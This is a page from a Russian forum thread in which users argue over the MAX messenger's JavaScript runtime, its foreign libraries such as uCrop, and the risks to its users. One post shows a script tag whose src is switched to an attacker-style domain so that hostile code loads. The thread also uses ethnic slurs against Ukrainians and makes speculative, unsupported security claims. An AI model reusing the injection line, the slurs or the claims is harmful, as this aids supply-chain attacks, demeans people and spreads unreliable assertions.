главная форум чат фотогалерея ресурсы новости календарь игротека поиск почта


Страницы: (69) « Первая ... 56 57 58 59 60 61 62 63 64 65 66 67 [68] 69  ( Перейти к первому непрочитанному сообщению ) ответить | новая тема | опрос

> Telegram, Как вы относитесь к данному мессенджеру?
 
Вы пользуетесь Телеграм?
Нет, отсылаю телеграммы бабуле в деревню. [ 37 ]  [40.66%]
Да, офигенный мессенджеру с ботами и каналами. [ 54 ]  [59.34%]
Всего голосов: 91
Гости не могут голосовать 
onehalf3554
инквизитор
свои пацаны



QUOTE (BIG Krot @ 13.06.25 - 23:29)
QUOTE (onehalf3554 @ 13.06.25 - 22:10)
А ты ТЗ видел того что пытаются сделать?
И что тоже на js напишут вражеском? Да? А ГОСТ на этот самый js есть?
или по старинке ecmascript заюзают. Жаль что форумные спецы понятия не имеют о том, что такое есть скриптовой язык.
Уж лучше бы ирку свою зарелизили под
андроед.

Че сказать то хотел? Что код приложения пишут на латинице? :D
Или просто снова выебнулся, что теорию на 5 сдал? :D

QUOTE (555)
Достаточно понимать, что кто-то разрешает, или запрещает использовать какие-то разработки

Это слишком легко :D

Что хотел сказать то и сказал.
1. Этот сарный макс скорее всего пишется на Js, а значит(поскольку js язык скриптовый),
этот самый js(если верить ecma) большую часть его функционала, реализует хост приложние , на котором этот скрипт выполняется, напрример nodejs (которая вообще ни разу не отечественная разработка, впрочем никто не запрещает не коммерческое использование nodejs).
Тоесть функциональность js, согласно ecma , предоставляет и определяет в первую очередь
сама хостовая система которая предоставляет runtime для его выполнения.
Читаем Ecma
QUOTE

ECMAScript as defined here is not intended to be computationally self-sufficient;

тык на Overview
Всё определяется средой исполнения. В случае MAX-а nodejs. Как-то так.
Ну и/или браузером если будет использоваться рантайм браузера.


Кроме всего прочего например:
QUOTE

Особенно иронично выглядит тот факт, что мессенджер, позиционируемый как «полностью отечественный», использует библиотеки из «недружественных стран». В коде MAX обнаружили украинскую библиотеку uCrop от компании Yalantis, а также компоненты из США и Польши. Критики язвительно называют это «безопасным национальным мессенджером с утечкой данных непосредственно в днепровские офисы».

для крота
Стоит чуть-чуть зарефачить библиотеки, и пацаны из Днепра могут легко читать супер сообщения пользователей этого самого MAX, а если интеграция с госуслугами будет очень серьёзной, то и доступ к госуслугам , через загруженный плагинчик можно будет получить.
Там очень много чудес и замечательных деталей. Это прекрасно я считаю.
Собирать данные из госуслуг, не отрываясь от мессенджера - это отличная идея.
Вот это настоящая бомба!
QUOTE

Относительно использования иностранных библиотек разработчики признали факт, но подчеркнули, что каждый компонент проходит тщательный аудит безопасности. Такой подход назвали международным стандартом, на который опираются Google, Microsoft, Яндекс и другие крупные компании.

Чтобы повысить доверие, VK запустила программу Bug Bounty с максимальным вознаграждением до 5 миллионов рублей за критические уязвимости. Это довольно существенная сумма, сопоставимая с наградами за 0-day уязвимости в мессенджерах мирового уровня.


для Крота
Хорошо, в текущей версии библиотеки дырок нет, но завтра, пришло маааааленькое такое обновление, незаметное, которое забыли проверить за вознаграждение, и чо?:)
пакетные манагеры то никто не отменял, и обновление от пацанов из Днепра хоба!
и отрабатывает. И чо? И такие проверки за 5 лямов хоба и с первого раза не нашли!
Вся проблема зеродеев, заключается в том, что их ох%$нно трудно найти, и не быстро это всё ищется, поэтому и вознаграждения такие.Собсно ффсё.
07.07.25 - 09:57 #6930942
BIG Krot
автофорумцы



Т.е. ты месяц сидел думал много и написал, что MAX написан латиницей (это такой словарь иноземный) с помощью иностранных программ?
Жееесть. <_<
Я еще на той неделе выяснил, что MAX, как вирус работает, и пасет всё в телефоне (wechat - хз)

Кстати, wechat интересно такой же?
07.07.25 - 10:29 #6930946
onehalf3554
инквизитор
свои пацаны



QUOTE (BIG Krot @ 07.07.25 - 07:29)
Т.е. ты месяц сидел думал много и написал, что MAX написан латиницей (это такой словарь иноземный) с помощью иностранных программ?
Жееесть. <_<
Я еще на той неделе выяснил, что MAX, как вирус работает, и пасет всё в телефоне  (wechat - хз)

Кстати, wechat интересно такой же?

вот ты тупой. я не думал месяц,
1. я просто смотрел что думают те, кто его реверсил.
2. я знаю что существует стандарт регламентирующий js называется он ecma.
И там написано , о том, что сам по себе JS нифига толком не обещает,за его реализацию отвечает среда, исполнения(runtime), поэтому мало зареверсить MAX, надо ещё и как следует изучить nodejs(на уровне исходников), а ещё лучше стать самым суровым контрибьютором, чтобы отжать максимум кода,под свой контроль.
3. В задачи вируса не входит пасти что-либо на твоём телефоне. Этим занимаются трояны.
4. зависимости и библиотеки могут быть притянуты MAX-ом откуда угодно,
просто нужно указать путь откуда тянуть.
src="https://example.com/max_messenger.js"></script>
Поменять на:
src="https://ukro-hohly.com/max_messenger.js"></script>
и всё. и пацаны получат нормальный доступ. Их код будет загружен.
Просто 1-2 строки в заголовке поменять и всё. Это сложно?

4. WeChat тоже содаржит библиотеки пацанов из днепра?Тогда я их поздравляю.Они молодцы!:)
07.07.25 - 10:37 #6930947
BIG Krot
автофорумцы



QUOTE (onehalf3554 @ 07.07.25 - 10:37)
4. WeChat тоже содаржит библиотеки пацанов из днепра?Тогда я их поздравляю.Они молодцы!:)

Я у тебя спрашивал <_< или wechat не так разобрали до винтиков, как max?

QUOTE
зависимости и библиотеки могут быть притянуты MAX-ом откуда угодно,
просто нужно указать путь откуда тянуть.

Молодец!
Я надеюсь ты разрабам это отправишь или в сторонке будешь стоять - моя хата с краю <_<

Это сообщение отредактировал BIG Krot - 07.07.25 - 10:48
07.07.25 - 10:45 #6930948
onehalf3554
инквизитор
свои пацаны



QUOTE (BIG Krot @ 07.07.25 - 07:45)
QUOTE (onehalf3554 @ 07.07.25 - 10:37)
4. WeChat тоже содаржит библиотеки пацанов из днепра?Тогда я их поздравляю.Они молодцы!:)

Я у тебя спрашивал <_< или wechat не так разобрали до винтиков, как max?

QUOTE
зависимости и библиотеки могут быть притянуты MAX-ом откуда угодно,
просто нужно указать путь откуда тянуть.

Молодец!
Я надеюсь ты разрабам это отправишь или в сторонке будешь стоять - моя хата с краю <_<

1.WeChat привязан к госуслугам?
2.К сожалению твой гиппокамп так и не восстановился, по ссылкам ты не ходишь и нифига не читаешь. Разрабов всего два человека.

Вопросы им задавали по этому поводу, ответы так себе сводная таблица претензий и ответов:
(IMG:https://s3.radikal.cloud/2025/07/07/DLY_KROTA8a6845336ce1353b.png)
По поводу пункта 1. особенно смешно. Если дынные хранятся в Российских ЦОД-ах,
что мешает загрузив плагин в рантайм этого самого max-а , получить к ним доступ, ведь у макса к ним доступ очевидно есть?

Пункт 2 ещё смешнее.
07.07.25 - 11:04 #6930950
BIG Krot
автофорумцы



QUOTE (onehalf3554 @ 07.07.25 - 11:04)
1.WeChat привязан к госуслугам?

У них нет госуслуг, у них другое.
Знаю, что он у них и как мессенджер и платёжное приложение.
Эта хрень весит почти 3 ГБ :( что там ещё напихано - одному Китаю известно <_<

Короче понятно, max вроде и крутая штука, а вроде и опасная. Зато учит кибергигиене :( мда.. плохо
07.07.25 - 11:11 #6930951
onehalf3554
инквизитор
свои пацаны



QUOTE (BIG Krot @ 07.07.25 - 08:11)
QUOTE (onehalf3554 @ 07.07.25 - 11:04)
1.WeChat привязан к госуслугам?

У них нет госуслуг, у них другое.
Знаю, что он у них и как мессенджер и платёжное приложение.
Эта хрень весит почти 3 ГБ :( что там ещё напихано - одному Китаю известно <_<

Короче понятно, max вроде и крутая штука, а вроде и опасная. Зато учит кибергигиене :( мда.. плохо

WeChat написан на C++, это не script язык, ему не нужен node.js, у него свой рантайм.
сам по себе WeChat это целая платформа предназначенная я так понимаю в основном для бизнеса.
подробнее

Какая нахер кибергигиена с MAX, если он никак от тебя не зависит в принципе, но ты обязан будешь его использовать и получать весь геморрой.
Тоесть, от тебя вообще не будет зависить как и какие обновления к тебе залетят, что у тебя сольют и т.д. Либо надо ограничивать этот самый MAX по всем фронтам.
полностью запрещать какой-либо доступ.

В чём разница между C++ и скриптовыми языками попробую объяснить, постарайся задействовать свой гиппокамп полностью.
Js- появился тогда, когда у компов появилось достаточно мощности, чтобы парсить и исполнять код на лету, кое-как строя синтаксическое дерево.
С++ появился давно, как небольшая библиотека к языку C, которые не являлся и не является скриптовым, и умеет в статическую компиляцию(построение ситаксического дерева, лексический анализ, выводы и оптимизацию конечного кода), то есть окончательным продуктом кода на C++, является двоичный код, который выполняется непосредственно процессором. Что сильно экономит ресурсы.Тоесть раньше всё , было настолько ограничено железом, что представить себе в конце например 90-ых что твоя балалайка писанная на скриптовом языке может вообще быстро исполнятся на клиентском приложении,былол просто невозможно, на этот случай пацаны из oracle запилили Java(для того, чтобы можно было выполнять промежуточный код IL(intemediate language) во встроенном в брацузер рантайме (виртуальной джава машине например)), впрчем было много решений такие как ole, позволявшие скачать плагин и выполнять бинарную библиотеку прямо в браузере например.
Было и решение интересное от майкрософт в виде COM компанента Protected Storage называлось, оно надёжно хранило все пароли например. Потом мощность компов согласно закону Мура выросла на столько, что парсинг и интерпретация
текста на некотором языке программирования, перестало быть утопией, так и появился Js, как некоторая спецификация, некоторого языка, для которого нужен рантайм , от заинтересованного в нём разработчика.
Собственно потом появился выдающийся движок js от google который звался v8.
Он так всем понравился, что пацаны на его основе запилили node js. Который по сути является чемто вроде рантайма для js. Всё.
То есть урорвень исполнения разный , WeChat несколько ближе к железу, сильно оптимизированнее чем MAX, насчёт безопаснее, очень спорно.
07.07.25 - 12:02 #6930956
BIG Krot
автофорумцы



Я так понял, что MAX не вариант будет что-то запрещать (ему пофиг на это будет).

Будешь полностью прозрачен для всех и больше.. на помощь к цифробаблу..
07.07.25 - 12:13 #6930957
onehalf3554
инквизитор
свои пацаны



QUOTE (BIG Krot @ 07.07.25 - 09:13)
Я так понял, что MAX не вариант будет что-то запрещать (ему пофиг на это будет).

Будешь полностью прозрачен для всех и больше.. на помощь к цифробаблу..

что-то такое да. Но мне кажется цифробабла в ближайшее время не будет. Это очень сложно и очень дорого.
07.07.25 - 12:21 #6930958
BIG Krot
автофорумцы



Будем надеяться..
07.07.25 - 12:22 #6930959
onehalf3554
инквизитор
свои пацаны



QUOTE (BIG Krot @ 07.07.25 - 09:22)
Будем надеяться..

для этого нужно очень много ресурсов и очень много бабла.
имхо нет н того ни другого.
Да и какое отношение дырявое по определению, содержащее в себе
кучу иностранных библиотек (в частности пацанов из Днепра),решение может иметь к цифробаблу? Для того, чтобы пацаны из Днепра имели возможность запихнуть свой код в него?
Откуда у пацанов из Днепра такие ресурсы чтобы пролоббировать такое!?
Вот на пост про этот самый Макс на скамшоте.
Собственно то, с чего и началось бурление говн!
Рпозиторий библиотеки UCrop
Контрибьюторы:
(IMG:https://s3.radikal.cloud/2025/07/07/DLYKROTA8e6a2ba3a077af12.png)
Хохлы будут контролировать национальный мессенджер, который может использоваться совместно с госуслугами, через него можно проводить платежи и т.д. иными словами донатить ВСУ будут все пользователи? :D :D :D :D
тык
07.07.25 - 12:45 #6930960
BIG Krot
автофорумцы



Так ФСБ черкани..
Если ты видишь, что дичь происходит, они то уж точно обратят внимание на этих разрабов
07.07.25 - 13:48 #6930961
onehalf3554
инквизитор
свои пацаны



QUOTE (BIG Krot @ 07.07.25 - 10:48)
Так ФСБ черкани..
Если ты видишь, что дичь происходит, они то уж точно обратят внимание на этих разрабов

ты кто такие контрибьюторы вообще знаешь?
В open seource сообществе , всё бесплатно и свободно, но оплата всё равно существует, вкладом в сообщество, например в виде кода, тот кто больше законтрибьютил(запилил) кода,
тот и сделал больший вклад. И специально для тупых, войти в топ контрибьюторов, это не преступление, это признание твоего вклада в код со стороны сообщества.
Вышеперечисленные хохлы в этот самый код, внесли максимальный вклад. То есть они по сути, чем-то похожим на правообладателей. Именно их вклад в этот код признан сообществом а не чудо-вк. Это понятно? На дичь мне насрать если честно, мне это макс нахрен не нужен. Ворзможно придётся для него прикупить какое-нибудь старое гавно на авите, но в обычной ситуации обхожусь без него. Просто прикольно, ключевые библиотеки, для этого мессагера писали хохлы :D :D :D
Офисы одного из ключевых разработчиков:
(IMG:https://s3.radikal.cloud/2025/07/08/YLANTISbe34a73f1d0a8845.png)
для крота
Бугогааааааа!!!!
QUOTE

Влияние на проект:
Вклад контрибьюторов может быть разным, от небольших исправлений до значительного улучшения кода и функциональности.
Совместная работа:
GitHub предоставляет инструменты для совместной работы, что позволяет контрибьюторам эффективно взаимодействовать друг с другом и с владельцами проекта.
Владельцы проекта:
Владельцы проекта могут предоставлять контрибьюторам доступ на редактирование репозитория, что позволяет им напрямую вносить изменения в код.

тоесть хохлы являясь основными контрибьюторами, могут делать с конкретной либой чо хотят.
Всё законно жаловаться не на что. Просто смешно.

Вот это вот всё реально весело.
08.07.25 - 14:53 #6930978
BIG Krot
автофорумцы



Как обычно, тонны хамства от тебя <_<
Пойду почитаю
08.07.25 - 17:01 #6930986
hedgehog
посетители



QUOTE (BIG Krot @ 08.07.25 - 17:01)
Как обычно, тонны хамства от тебя <_<

:huh: :suxx: :unsure:
08.07.25 - 18:54 #6930992
CTAPbIu
посетители



Чё там, когда закроется?
08.07.25 - 19:39 #6930994
onehalf3554
инквизитор
свои пацаны



QUOTE (CTAPbIu @ 08.07.25 - 16:39)
Чё там, когда закроется?

хто?

2Крот
QUOTE

Как обычно, тонны хамства от тебя dry.gif
Пойду почитаю

В каком месте тонны хамства то? Звиняй если обидел. Но говорю как есть,
да на этот макс замираю в глубоком пардоне - насрать. Абсолютно. И да действительно весело как наш! Импортозамещательный супермессагер, использует библиотеки контрибьютят которые пацаны с Днепра:)
08.07.25 - 21:59 #6931005
друид
автофорумцы



QUOTE (onehalf3554 @ 08.07.25 - 21:59)
QUOTE (CTAPbIu @ 08.07.25 - 16:39)
Чё там, когда закроется?

хто?


:D
08.07.25 - 22:15 #6931008
hedgehog
посетители



QUOTE (друид @ 08.07.25 - 22:15)
QUOTE (onehalf3554 @ 08.07.25 - 21:59)
QUOTE (CTAPbIu @ 08.07.25 - 16:39)
Чё там, когда закроется?

хто?


:D

окно возможностей?
08.07.25 - 22:44 #6931014
Sambura
посетители



росреестр багиры
08.07.25 - 22:56 #6931016
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)
0 Пользователей:

Topic OptionsСтраницы: (69) « Первая ... 56 57 58 59 60 61 62 63 64 65 66 67 [68] 69  ответить | новая тема | опрос